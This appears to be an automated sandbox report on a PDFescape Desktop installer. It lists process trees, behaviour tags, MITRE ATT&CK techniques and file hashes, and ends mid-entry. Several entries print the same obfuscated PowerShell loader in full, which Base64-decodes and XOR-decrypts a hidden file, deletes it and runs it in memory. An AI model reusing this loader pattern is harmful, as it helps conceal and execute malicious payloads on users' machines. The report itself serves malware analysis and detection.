"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$159366958779e153824eed62df259da4='C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e';$2c79dd0ee971576f89f8beb451a866db='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$f96bff001b43bef5a246eac05f9f597d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($159366958779e153824eed62df259da4));remove-item $159366958779e153824eed62df259da4;for($i=0;$i -lt $f96bff001b43bef5a246eac05f9f597d.count;){for($j=0;$j -lt $2c79dd0ee971576f89f8beb451a866db.length;$j++){$f96bff001b43bef5a246eac05f9f597d[$i]=$f96bff001b43bef5a246eac05f9f597d[$i] -bxor $2c79dd0ee971576f89f8beb451a866db[$j];$i++;if($i -ge $f96bff001b43bef5a246eac05f9f597d.count){$j=$2c79dd0ee971576f89f8beb451a866db.length}}};$f96bff001b43bef5a246eac05f9f597d=[System.Text.Encoding]::UTF8.GetString($f96bff001b43bef5a246eac05f9f597d);iex $f96bff001b43bef5a246eac05f9f597d;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
1⤵
- Loads dropped DLL
PID:4040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3224

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:7056

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:12172

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"
2⤵
- Loads dropped DLL
PID:4396

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:780

C:\Windows\syswow64\MsiExec.exe
"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"
2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
PID:5144

C:\Program Files\PDFescape Desktop\ws.exe
"C:\Program Files\PDFescape Desktop\ws.exe" -service
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:5484

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 1C738FF4F03AEC73B7A07AC7D5F69CD3 E Global\MSI0000
2⤵
- Loads dropped DLL
PID:6088

C:\Program Files\PDFescape Desktop\updater-ws.exe
"C:\Program Files\PDFescape Desktop\updater-ws.exe" -service
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:6364

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:11144

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
PID:6032

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:5136

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:5232

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"
2⤵
- Loads dropped DLL
PID:816

C:\Windows\syswow64\MsiExec.exe
"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
2⤵
- Loads dropped DLL
- Modifies registry class
PID:5176

C:\Windows\syswow64\MsiExec.exe
"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
PID:4452

C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe
"C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7416

C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe
"C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:10380

C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe
"C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:2076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2812

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:9264

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:10640

C:\Program Files\PDFescape Desktop\escape.exe
"C:\Program Files\PDFescape Desktop\escape.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:12644

C:\Program Files\PDFescape Desktop\ws.exe
"C:\Program Files\PDFescape Desktop\ws.exe"
1⤵
- Executes dropped EXE
- Modifies registry class
PID:12752

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:13120

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:13200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10812

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Browser Extensions

T1176

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
MD5
a733c1f89219252497e94cbc66272478

SHA1
f5f9be9a2345f6dc0414c3b62b4087faa32ce351

SHA256
557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547

SHA512
875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd

Download Submit
C:\Program Files\PDFescape Desktop\atom.dll
MD5
9148f07e6dedce3e8e6a642fba0402d8

SHA1
2e403f6b65bf4519d0883ebb0025d77130105a1c

SHA256
35bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a

SHA512
8f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb

Download Submit
C:\Program Files\PDFescape Desktop\brand.dll
MD5
594a3e3adcf139e7b20eddd1f16131d3

SHA1
7700c89b10e779fc6db72b42be0a81fe89378f9a

SHA256
52163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad

SHA512
d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc

Download Submit
C:\Program Files\PDFescape Desktop\context-menu.dll
MD5
2c9f26866787b200996d99ad160be2b2

SHA1
fec80f5b4a6acf29f74a2bc8918298518a487597

SHA256
4e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57

SHA512
9ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd

Download Submit
C:\Program Files\PDFescape Desktop\encoding-conversion.dll
MD5
448a6de619faf0f403c897b142f619c5

SHA1
e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2

SHA256
00a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51

SHA512
f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d

Download Submit
C:\Program Files\PDFescape Desktop\libcrypto-1_1-x64.dll
MD5
ff8eff50eb5617340e3deedbcdf6e631

SHA1
91ebda9ef152340d68b94c7b853f97c806cb3d58

SHA256
f1dd94b6e80e0ab91c7124d9a5ed37bcd70a61ba28721d3247e816de669c3f16

SHA512
c1f889bc348552a46a25c18abe7633b73feb5e59c39db891bae43b5e25adbb96a5bcb259728911cb9b067b530633115027fb02f46ae684096189331ca2d1a2de

Download Submit
C:\Program Files\PDFescape Desktop\libcurl.dll
MD5
140cdda2f51d89dc194a8b8c3ab9e463

SHA1
255180975a70d00d31d516ecc895e42fd18c24bf

SHA256
a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15

SHA512
5065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4

Download Submit
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dll
MD5
62dc606e7f85f8f15a582a045e394d19

SHA1
bad647ebb9207e2b20d464c6b420c84b971519d2

SHA256
7a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411

SHA512
d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f

Download Submit
C:\Program Files\PDFescape Desktop\pdfcore.dll
MD5
c10d1adf13c2edde02e6adf49d1c900b

SHA1
4455fc9f229dedf4dd5622e6675c7a03ac8bd4d6

SHA256
6e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44

SHA512
0768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe

Download Submit
C:\Program Files\PDFescape Desktop\pdfgraphics.dll
MD5
1fc38631bf08eff07e8466f69ce90a46

SHA1
3973584e1371dfb26ae31cb4b555c972bd30f5a4

SHA256
78c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89

SHA512
5818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db

Download Submit
C:\Program Files\PDFescape Desktop\pdfview.dll
MD5
40ca796430abed5d369f0781af26481e

SHA1
49abef703e2c9c70e691d8971505691402c2e745

SHA256
e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19

SHA512
38a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8

Download Submit
C:\Program Files\PDFescape Desktop\preview-handler.dll
MD5
0a58eba4b339c0bb6f44a314ee06d7c7

SHA1
136b337a2c80fce2e4c0732fe5c821d58aad7d40

SHA256
32dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a

SHA512
18d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85

Download Submit
C:\Program Files\PDFescape Desktop\root-service-provider.dll
MD5
58c639f842629bf97596add29b0ad19c

SHA1
059b152148a8fb92f9b8f119fa95608240ea2957

SHA256
40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503

SHA512
f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a

Download Submit
C:\Program Files\PDFescape Desktop\thumbnail-handler.dll
MD5
5c467cd8042003e71597dccb53a03bfb

SHA1
134db7349cfc485ee5f32b9583210843e02acdda

SHA256
2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85

SHA512
b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99

Download Submit
C:\Program Files\PDFescape Desktop\ws.exe
MD5
c86fef0f4c86065fda9368fe5a1043d0

SHA1
9c858857549675608c933b980d2f74c0ffaaa769

SHA256
f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65

SHA512
4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812

Download Submit
C:\Program Files\PDFescape Desktop\ws.exe
MD5
c86fef0f4c86065fda9368fe5a1043d0

SHA1
9c858857549675608c933b980d2f74c0ffaaa769

SHA256
f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65

SHA512
4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
MD5
87d28b3d2df1cab3711bf8d3b5b520c2

SHA1
1987a4bf2a37f6538c701461357a52b0bce1b980

SHA256
88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

SHA512
19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
MD5
87d28b3d2df1cab3711bf8d3b5b520c2

SHA1
1987a4bf2a37f6538c701461357a52b0bce1b980

SHA256
88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

SHA512
19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll
MD5
e5a591c125fdf21381cf543ed7706c66

SHA1
0baad9f119616ce5d0d39d4cdc9c884c1002a24e

SHA256
15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

SHA512
20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msi
MD5
692a85c10d2e69d290a14aef95aae86f

SHA1
381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1

SHA256
65f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d

SHA512
38a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933

Download Submit
C:\Users\Admin\88f63d2f673a2f59fd0b380d98276b1f\e4cbd61aecb4f71bff7acbd0859e0141\86d6a24bd2f5fea508a694b6073c3446\d45af05453ed762ae6cc225b979ee648\721d5653b9a74b948ed452804511a77c\99cee2637dca1f106ad3cb2e055a4410\7d62f5b0569657d51524ad8f4ca1f70e
MD5
f49af433f9076c15cab2d858be35b939

SHA1
19fb76407184356e82560714f225a323ec19abc9

SHA256
c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154

SHA512
89163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
MD5
01ac3f2e5e3ba987a99a75e476a0e4ea

SHA1
5f13b2ff32953265779fcd993e938c6a6f17d000

SHA256
529bac0f2e2aaccdb5ad7f778f7c1e786e76927e83af8d89de0120871ecdc604

SHA512
fa2015732571b3f3a2a7ae7dc2fd8f98367f699090aa4a3ade4eae00e4451996a2a5c9a1287d2c853adefd4b96ccd9ecd42e51073aeb3c29379d42985b9c3b5f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
MD5
3a988bae257d280c4de52b1f0cfdcd11

SHA1
